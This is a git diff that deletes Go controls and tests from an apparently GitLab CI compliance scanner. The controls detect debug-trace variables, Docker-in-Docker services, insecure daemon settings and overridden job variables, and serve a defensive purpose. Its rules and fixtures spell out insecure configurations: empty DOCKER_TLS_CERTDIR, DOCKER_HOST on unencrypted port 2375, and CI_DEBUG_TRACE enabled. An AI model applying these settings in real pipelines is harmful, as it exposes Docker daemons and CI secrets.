- map[string]interface{}{"CI_DEBUG_TRACE": "true"},
- map[string]interface{}{"test-job": jobContent},
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues, got %d", len(result.Issues))
- }
- if result.Metrics.ForbiddenFound != 2 {
- t.Fatalf("expected ForbiddenFound 2, got %d", result.Metrics.ForbiddenFound)
- }
-}
-
-func TestDebugTrace_CaseInsensitiveVariableMatch(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"ci_debug_trace"},
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"CI_DEBUG_TRACE": "true"},
- nil,
- )
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected case-insensitive match to find 1 issue, got %d", len(result.Issues))
- }
-}
-
-func TestDebugTrace_NoIssuesCleanConfig(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE", "CI_DEBUG_SERVICES"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "variables": map[interface{}]interface{}{
- "MY_VAR": "hello",
- },
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"SOME_VAR": "value"},
- map[string]interface{}{"build": jobContent},
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues, got %d", len(result.Issues))
- }
- if result.Metrics.TotalVariablesChecked < 2 {
- t.Fatalf("expected at least 2 variables checked, got %d", result.Metrics.TotalVariablesChecked)
- }
-}
-
-func TestIsTrueValue(t *testing.T) {
- tests := []struct {
- input string
- want bool
- }{
- {"true", true},
- {"TRUE", true},
- {"True", true},
- {" true ", true},
- {"1", true},
- {"yes", true},
- {"YES", true},
- {"Yes", true},
- {"false", false},
- {"0", false},
- {"no", false},
- {"", false},
- {"random", false},
- {"truthy", false},
- }
-
- for _, tt := range tests {
- t.Run(tt.input, func(t *testing.T) {
- got := isTrueValue(tt.input)
- if got != tt.want {
- t.Fatalf("isTrueValue(%q) = %v, want %v", tt.input, got, tt.want)
- }
- })
- }
-}
diff --git a/control/controlGitlabPipelineDockerInDocker.go b/control/controlGitlabPipelineDockerInDocker.go
deleted file mode 100644
index fed3389..0000000
--- a/control/controlGitlabPipelineDockerInDocker.go
+++ /dev/null
@@ -1,310 +0,0 @@
-package control
-
-import (
- "fmt"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
- "gopkg.in/yaml.v2"
-)
-
-const ControlTypeGitlabPipelineDockerInDockerVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineDockerInDockerConf holds the configuration for Docker-in-Docker detection
-type GitlabPipelineDockerInDockerConf struct {
- Enabled bool `json:"enabled"`
- DetectInsecureDaemon bool `json:"detectInsecureDaemon"`
-}
-
-// GetConf loads configuration from PlumberConfig.
-// If config is nil or the control section is missing, the control is disabled (skipped).
-func (p *GitlabPipelineDockerInDockerConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- cfg := plumberConfig.GetPipelineMustNotUseDockerInDockerConfig()
- if cfg == nil {
- l.Debug("pipelineMustNotUseDockerInDocker control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- if cfg.Enabled == nil {
- return fmt.Errorf("pipelineMustNotUseDockerInDocker.enabled field is required in .plumber.yaml config file")
- }
-
- p.Enabled = cfg.IsEnabled()
- p.DetectInsecureDaemon = cfg.IsDetectInsecureDaemonEnabled()
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "detectInsecureDaemon": p.DetectInsecureDaemon,
- }).Debug("pipelineMustNotUseDockerInDocker control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineDockerInDockerMetrics holds metrics about DinD detection
-type GitlabPipelineDockerInDockerMetrics struct {
- TotalJobsChecked uint `json:"totalJobsChecked"`
- DindServicesFound uint `json:"dindServicesFound"`
- InsecureDaemonFound uint `json:"insecureDaemonFound"`
-}
-
-// GitlabPipelineDockerInDockerResult holds the result of the DinD control
-type GitlabPipelineDockerInDockerResult struct {
- Issues []GitlabPipelineDockerInDockerIssue `json:"issues"`
- Metrics GitlabPipelineDockerInDockerMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineDockerInDockerIssue represents a DinD finding in the CI config
-type GitlabPipelineDockerInDockerIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- JobName string `json:"jobName"`
- ServiceImage string `json:"serviceImage,omitempty"`
- Detail string `json:"detail,omitempty"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// isDindImage returns true if the image name refers to a Docker-in-Docker service.
-func isDindImage(image string) bool {
- image = strings.ToLower(strings.TrimSpace(image))
- if image == "" {
- return false
- }
-
- // Strip registry prefix to normalize (e.g. docker.io/docker:dind -> docker:dind)
- parts := strings.Split(image, "/")
- shortName := parts[len(parts)-1]
-
- // Match docker:dind, docker:*-dind, docker:latest
- if !strings.HasPrefix(shortName, "docker:") && shortName != "docker" {
- return false
- }
-
- // docker (no tag) is not necessarily dind
- if shortName == "docker" {
- return false
- }
-
- tag := strings.TrimPrefix(shortName, "docker:")
- if tag == "dind" || tag == "latest" {
- return true
- }
- // Match version-dind patterns like 27.3.1-dind, 27-dind-rootless
- if strings.Contains(tag, "dind") {
- return true
- }
- return false
-}
-
-// parseServiceNames extracts service image names from the Services field of a GitlabJob.
-// GitLab allows services as a list of strings or a list of maps with a "name" key.
-func parseServiceNames(services interface{}) []string {
- if services == nil {
- return nil
- }
-
- switch s := services.(type) {
- case []interface{}:
- var names []string
- for _, item := range s {
- switch entry := item.(type) {
- case string:
- names = append(names, entry)
- case map[interface{}]interface{}:
- // Try to parse as gitlab.Service struct
- svc := gitlab.Service{}
- yamlData, err := yaml.Marshal(entry)
- if err == nil {
- _ = yaml.Unmarshal(yamlData, &svc)
- }
- if svc.Name != "" {
- names = append(names, svc.Name)
- }
- }
- }
- return names
- default:
- return nil
- }
-}
-
-// Run executes the Docker-in-Docker detection control
-func (p *GitlabPipelineDockerInDockerConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineDockerInDockerResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineDockerInDocker",
- "controlVersion": ControlTypeGitlabPipelineDockerInDockerVersion,
- })
- l.Info("Start Docker-in-Docker detection control")
-
- result := &GitlabPipelineDockerInDockerResult{
- Issues: []GitlabPipelineDockerInDockerIssue{},
- Metrics: GitlabPipelineDockerInDockerMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabPipelineDockerInDockerVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Docker-in-Docker detection control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- mergedConf := pipelineOriginData.MergedConf
- if mergedConf == nil {
- l.Warn("Merged CI configuration not available, cannot check services")
- result.Compliance = 0
- result.Error = "merged CI configuration not available"
- return result
- }
-
- for jobName, jobContent := range mergedConf.GitlabJobs {
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job, skipping")
- continue
- }
- if job == nil {
- continue
- }
-
- result.Metrics.TotalJobsChecked++
-
- serviceNames := parseServiceNames(job.Services)
- hasDind := false
- var dindImage string
-
- for _, svc := range serviceNames {
- if isDindImage(svc) {
- hasDind = true
- dindImage = svc
- break
- }
- }
-
- if !hasDind {
- continue
- }
-
- // DinD service found: emit ISSUE-412
- result.Issues = append(result.Issues, GitlabPipelineDockerInDockerIssue{
- Code: CodeDockerInDockerUsage,
- DocURL: CodeDockerInDockerUsage.DocURL(),
- JobName: jobName,
- ServiceImage: dindImage,
- })
- result.Metrics.DindServicesFound++
-
- l.WithFields(logrus.Fields{
- "job": jobName,
- "service": dindImage,
- }).Debug("Docker-in-Docker service found")
-
- // If detectInsecureDaemon is enabled, check for insecure config in the same job
- if p.DetectInsecureDaemon {
- if detail := detectInsecureDaemon(job, mergedConf); detail != "" {
- result.Issues = append(result.Issues, GitlabPipelineDockerInDockerIssue{
- Code: CodeDockerInDockerInsecure,
- DocURL: CodeDockerInDockerInsecure.DocURL(),
- JobName: jobName,
- Detail: detail,
- })
- result.Metrics.InsecureDaemonFound++
-
- l.WithFields(logrus.Fields{
- "job": jobName,
- "detail": detail,
- }).Debug("Insecure Docker daemon configuration found")
- }
- }
- }
-
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Info("Docker-in-Docker issues found, setting compliance to 0")
- }
-
- l.WithFields(logrus.Fields{
- "totalJobsChecked": result.Metrics.TotalJobsChecked,
- "dindServicesFound": result.Metrics.DindServicesFound,
- "insecureDaemonFound": result.Metrics.InsecureDaemonFound,
- "compliance": result.Compliance,
- }).Info("Docker-in-Docker detection control completed")
-
- return result
-}
-
-// detectInsecureDaemon checks job-level and global variables for insecure Docker daemon settings.
-// Returns a description of the finding, or empty string if none.
-func detectInsecureDaemon(job *gitlab.GitlabJob, mergedConf *gitlab.GitlabCIConf) string {
- var findings []string
-
- // Check job variables first
- jobVars, err := gitlab.ParseJobVariables(job)
- if err == nil {
- if checkInsecureVars(jobVars) != "" {
- findings = append(findings, checkInsecureVars(jobVars))
- }
- }
-
- // Also check global variables
- globalVars, err := gitlab.ParseGlobalVariables(mergedConf)
- if err == nil {
- if result := checkInsecureVars(globalVars); result != "" {
- // Avoid duplicates if already found in job vars
- if len(findings) == 0 || findings[0] != result {
- findings = append(findings, result)
- }
- }
- }
-
- return strings.Join(findings, "; ")
-}
-
-// checkInsecureVars inspects a variable map for insecure Docker daemon settings.
-func checkInsecureVars(vars map[string]string) string {
- var parts []string
-
- for key, value := range vars {
- upperKey := strings.ToUpper(key)
- if upperKey == "DOCKER_TLS_CERTDIR" && strings.TrimSpace(value) == "" {
- parts = append(parts, "DOCKER_TLS_CERTDIR is empty (TLS disabled)")
- }
- if upperKey == "DOCKER_HOST" && strings.Contains(value, ":2375") {
- parts = append(parts, fmt.Sprintf("DOCKER_HOST uses non-TLS port 2375 (%s)", value))
- }
- }
-
- return strings.Join(parts, "; ")
-}
diff --git a/control/controlGitlabPipelineDockerInDocker_test.go b/control/controlGitlabPipelineDockerInDocker_test.go
deleted file mode 100644
index f89a401..0000000
--- a/control/controlGitlabPipelineDockerInDocker_test.go
+++ /dev/null
@@ -1,416 +0,0 @@
-package control
-
-import (
- "testing"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/gitlab"
-)
-
-func buildOriginDataForDinD(globalVars map[string]interface{}, jobs map[string]interface{}) *collector.GitlabPipelineOriginData {
- mergedConf := &gitlab.GitlabCIConf{
- GlobalVariables: globalVars,
- GitlabJobs: jobs,
- }
- return &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- CiValid: true,
- CiMissing: false,
- }
-}
-
-func TestDockerInDocker_Disabled(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: false,
- DetectInsecureDaemon: true,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when disabled")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when skipped, got %v", result.Compliance)
- }
-}
-
-func TestDockerInDocker_NilMergedConf(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: true,
- }
- data := &collector.GitlabPipelineOriginData{
- MergedConf: nil,
- CiValid: true,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control not to be skipped")
- }
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0 when merged conf unavailable, got %v", result.Compliance)
- }
- if result.Error == "" {
- t.Fatal("expected error message when merged conf unavailable")
- }
-}
-
-func TestDockerInDocker_DindServiceDetected(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build-image": jobContent})
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control to run")
- }
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- issue := result.Issues[0]
- if issue.Code != CodeDockerInDockerUsage {
- t.Fatalf("expected code %s, got %s", CodeDockerInDockerUsage, issue.Code)
- }
- if issue.JobName != "build-image" {
- t.Fatalf("expected job name 'build-image', got %s", issue.JobName)
- }
- if issue.ServiceImage != "docker:dind" {
- t.Fatalf("expected service image 'docker:dind', got %s", issue.ServiceImage)
- }
- if result.Metrics.DindServicesFound != 1 {
- t.Fatalf("expected DindServicesFound 1, got %d", result.Metrics.DindServicesFound)
- }
-}
-
-func TestDockerInDocker_VersionedDindTag(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:27.3.1-dind"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue for versioned dind tag, got %d", len(result.Issues))
- }
- if result.Issues[0].ServiceImage != "docker:27.3.1-dind" {
- t.Fatalf("expected service image 'docker:27.3.1-dind', got %s", result.Issues[0].ServiceImage)
- }
-}
-
-func TestDockerInDocker_LatestTag(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:latest"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue for docker:latest, got %d", len(result.Issues))
- }
-}
-
-func TestDockerInDocker_ServiceAsMap(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- svcMap := map[interface{}]interface{}{
- "name": "docker:27-dind",
- "alias": "docker",
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{svcMap},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue for service map with dind, got %d", len(result.Issues))
- }
- if result.Issues[0].ServiceImage != "docker:27-dind" {
- t.Fatalf("expected service image 'docker:27-dind', got %s", result.Issues[0].ServiceImage)
- }
-}
-
-func TestDockerInDocker_NoDindService(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: true,
- }
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "services": []interface{}{"postgres:15"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"test": jobContent})
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 with no dind, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues, got %d", len(result.Issues))
- }
-}
-
-func TestDockerInDocker_InsecureVarsWithoutDind(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: true,
- }
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "services": []interface{}{"postgres:15"},
- "variables": map[interface{}]interface{}{
- "DOCKER_TLS_CERTDIR": "",
- "DOCKER_HOST": "tcp://docker:2375",
- },
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"test": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues when insecure vars present but no dind service, got %d", len(result.Issues))
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
-}
-
-func TestDockerInDocker_DindWithInsecureJobVars(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: true,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- "variables": map[interface{}]interface{}{
- "DOCKER_TLS_CERTDIR": "",
- "DOCKER_HOST": "tcp://docker:2375",
- },
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- // Should have 2 issues: ISSUE-412 (dind usage) + ISSUE-413 (insecure daemon)
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues (dind + insecure), got %d", len(result.Issues))
- }
- if result.Issues[0].Code != CodeDockerInDockerUsage {
- t.Fatalf("expected first issue code %s, got %s", CodeDockerInDockerUsage, result.Issues[0].Code)
- }
- if result.Issues[1].Code != CodeDockerInDockerInsecure {
- t.Fatalf("expected second issue code %s, got %s", CodeDockerInDockerInsecure, result.Issues[1].Code)
- }
- if result.Issues[1].Detail == "" {
- t.Fatal("expected detail on insecure daemon issue")
- }
- if result.Metrics.DindServicesFound != 1 {
- t.Fatalf("expected DindServicesFound 1, got %d", result.Metrics.DindServicesFound)
- }
- if result.Metrics.InsecureDaemonFound != 1 {
- t.Fatalf("expected InsecureDaemonFound 1, got %d", result.Metrics.InsecureDaemonFound)
- }
-}
-
-func TestDockerInDocker_DindWithInsecureGlobalVars(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: true,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- }
- globalVars := map[string]interface{}{
- "DOCKER_TLS_CERTDIR": "",
- }
- data := buildOriginDataForDinD(globalVars, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues (dind + insecure from global), got %d", len(result.Issues))
- }
- if result.Issues[1].Code != CodeDockerInDockerInsecure {
- t.Fatalf("expected second issue to be insecure daemon, got %s", result.Issues[1].Code)
- }
-}
-
-func TestDockerInDocker_DindSecureDaemonNoInsecureIssue(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: true,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- "variables": map[interface{}]interface{}{
- "DOCKER_TLS_CERTDIR": "/certs",
- "DOCKER_HOST": "tcp://docker:2376",
- },
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- // Only dind usage issue, no insecure daemon issue
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue (dind only, no insecure), got %d", len(result.Issues))
- }
- if result.Issues[0].Code != CodeDockerInDockerUsage {
- t.Fatalf("expected code %s, got %s", CodeDockerInDockerUsage, result.Issues[0].Code)
- }
-}
-
-func TestDockerInDocker_DetectInsecureDaemonDisabled(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- jobContent := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- "variables": map[interface{}]interface{}{
- "DOCKER_TLS_CERTDIR": "",
- },
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"build": jobContent})
-
- result := conf.Run(data)
-
- // Only dind usage, insecure daemon check skipped
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue (detect insecure disabled), got %d", len(result.Issues))
- }
- if result.Issues[0].Code != CodeDockerInDockerUsage {
- t.Fatalf("expected code %s, got %s", CodeDockerInDockerUsage, result.Issues[0].Code)
- }
-}
-
-func TestDockerInDocker_MultipleJobs(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- job1 := map[interface{}]interface{}{
- "script": "docker build .",
- "services": []interface{}{"docker:dind"},
- }
- job2 := map[interface{}]interface{}{
- "script": "echo test",
- "services": []interface{}{"postgres:15"},
- }
- job3 := map[interface{}]interface{}{
- "script": "docker push",
- "services": []interface{}{"docker:27-dind"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{
- "build": job1,
- "test": job2,
- "deploy": job3,
- })
-
- result := conf.Run(data)
-
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues (two dind jobs), got %d", len(result.Issues))
- }
- if result.Metrics.DindServicesFound != 2 {
- t.Fatalf("expected DindServicesFound 2, got %d", result.Metrics.DindServicesFound)
- }
-}
-
-func TestDockerInDocker_NonDindDockerImage(t *testing.T) {
- conf := &GitlabPipelineDockerInDockerConf{
- Enabled: true,
- DetectInsecureDaemon: false,
- }
- // docker:27 without -dind suffix is just the Docker CLI, not DinD
- jobContent := map[interface{}]interface{}{
- "script": "docker version",
- "services": []interface{}{"docker:27"},
- }
- data := buildOriginDataForDinD(nil, map[string]interface{}{"check": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues for docker:27 (not dind), got %d", len(result.Issues))
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
-}
-
-func TestIsDindImage(t *testing.T) {
- tests := []struct {
- image string
- expected bool
- }{
- {"docker:dind", true},
- {"docker:latest", true},
- {"docker:27-dind", true},
- {"docker:27.3.1-dind", true},
- {"docker:dind-rootless", true},
- {"docker:27-dind-rootless", true},
- {"docker:27", false},
- {"docker:27.3.1", false},
- {"docker", false},
- {"postgres:15", false},
- {"", false},
- {"registry.example.com/docker:dind", true},
- {"docker.io/library/docker:dind", true},
- }
-
- for _, tt := range tests {
- t.Run(tt.image, func(t *testing.T) {
- got := isDindImage(tt.image)
- if got != tt.expected {
- t.Fatalf("isDindImage(%q) = %v, want %v", tt.image, got, tt.expected)
- }
- })
- }
-}
diff --git a/control/controlGitlabPipelineJobVariablesOverride.go b/control/controlGitlabPipelineJobVariablesOverride.go
deleted file mode 100644
index 7f22d60..0000000
--- a/control/controlGitlabPipelineJobVariablesOverride.go
+++ /dev/null
@@ -1,217 +0,0 @@
-package control
-
-import (
- "fmt"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineJobVariablesOverrideVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineJobVariablesOverrideConf holds the configuration for job variable override detection
-type GitlabPipelineJobVariablesOverrideConf struct {
- Enabled bool `json:"enabled"`
- Variables []string `json:"variables"`
-}
-
-// GetConf loads configuration from PlumberConfig.
-// If config is nil or the control section is missing, the control is disabled (skipped).
-func (p *GitlabPipelineJobVariablesOverrideConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- cfg := plumberConfig.GetPipelineMustNotOverrideJobVariablesConfig()
- if cfg == nil {
- l.Debug("pipelineMustNotOverrideJobVariables control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- if cfg.Enabled == nil {
- return fmt.Errorf("pipelineMustNotOverrideJobVariables.enabled field is required in .plumber.yaml config file")
- }
-
- p.Enabled = cfg.IsEnabled()
- p.Variables = cfg.Variables
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "variables": p.Variables,
- }).Debug("pipelineMustNotOverrideJobVariables control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineJobVariablesOverrideMetrics holds metrics about variable override detection
-type GitlabPipelineJobVariablesOverrideMetrics struct {
- TotalVariablesChecked uint `json:"totalVariablesChecked"`
- OverriddenFound uint `json:"overriddenFound"`
-}
-
-// GitlabPipelineJobVariablesOverrideResult holds the result of the control
-type GitlabPipelineJobVariablesOverrideResult struct {
- Issues []GitlabPipelineJobVariablesOverrideIssue `json:"issues"`
- Metrics GitlabPipelineJobVariablesOverrideMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineJobVariablesOverrideIssue represents a variable that should not be defined in the CI config
-type GitlabPipelineJobVariablesOverrideIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- VariableName string `json:"variableName"`
- Value string `json:"value"`
- Location string `json:"location"` // "global" or job name
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the job variable override detection control.
-// It scans the raw (pre-merge) CI config so that only variables the user
-// actually wrote in .gitlab-ci.yml are checked. Variables injected by
-// included templates/components are ignored.
-func (p *GitlabPipelineJobVariablesOverrideConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineJobVariablesOverrideResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineJobVariablesOverride",
- "controlVersion": ControlTypeGitlabPipelineJobVariablesOverrideVersion,
- })
- l.Info("Start job variable override detection control")
-
- result := &GitlabPipelineJobVariablesOverrideResult{
- Issues: []GitlabPipelineJobVariablesOverrideIssue{},
- Metrics: GitlabPipelineJobVariablesOverrideMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabPipelineJobVariablesOverrideVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Job variable override detection control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- if len(p.Variables) == 0 {
- l.Info("No variables configured, skipping")
- result.Skipped = true
- return result
- }
-
- // Use the raw (pre-merge) config so we only see variables the user
- // actually wrote, not variables injected by included templates.
- rawConf := pipelineOriginData.Conf
- if rawConf == nil {
- l.Warn("Raw CI configuration not available, cannot check variables")
- result.Compliance = 0
- result.Error = "raw CI configuration not available"
- return result
- }
-
- // Build a set of variable names to detect (case-insensitive)
- varSet := make(map[string]bool, len(p.Variables))
- for _, v := range p.Variables {
- varSet[strings.ToUpper(v)] = true
- }
-
- // Check global variables
- globalVars, err := gitlab.ParseGlobalVariables(rawConf)
- if err != nil {
- l.WithError(err).Warn("Unable to parse global variables")
- } else {
- for key, value := range globalVars {
- result.Metrics.TotalVariablesChecked++
- if varSet[strings.ToUpper(key)] {
- result.Issues = append(result.Issues, GitlabPipelineJobVariablesOverrideIssue{
- Code: CodeJobVariableOverridden,
- DocURL: CodeJobVariableOverridden.DocURL(),
- VariableName: key,
- Value: value,
- Location: "global",
- })
- result.Metrics.OverriddenFound++
- l.WithFields(logrus.Fields{
- "variable": key,
- "value": value,
- "location": "global",
- }).Debug("Overridden variable found in global variables")
- }
- }
- }
-
- // Check per-job variables (only jobs the user defined in .gitlab-ci.yml)
- for jobName, jobContent := range rawConf.GitlabJobs {
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job, skipping")
- continue
- }
- if job == nil {
- continue
- }
-
- jobVars, err := gitlab.ParseJobVariables(job)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job variables, skipping")
- continue
- }
-
- for key, value := range jobVars {
- result.Metrics.TotalVariablesChecked++
- if varSet[strings.ToUpper(key)] {
- result.Issues = append(result.Issues, GitlabPipelineJobVariablesOverrideIssue{
- Code: CodeJobVariableOverridden,
- DocURL: CodeJobVariableOverridden.DocURL(),
- VariableName: key,
- Value: value,
- Location: jobName,
- })
- result.Metrics.OverriddenFound++
- l.WithFields(logrus.Fields{
- "variable": key,
- "value": value,
- "location": jobName,
- }).Debug("Overridden variable found in job variables")
- }
- }
- }
-
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Info("Overridden variables found, setting compliance to 0")
- }
-
- l.WithFields(logrus.Fields{
- "totalChecked": result.Metrics.TotalVariablesChecked,
- "overriddenFound": result.Metrics.OverriddenFound,
- "compliance": result.Compliance,
- }).Info("Job variable override detection control completed")
-
- return result
-}
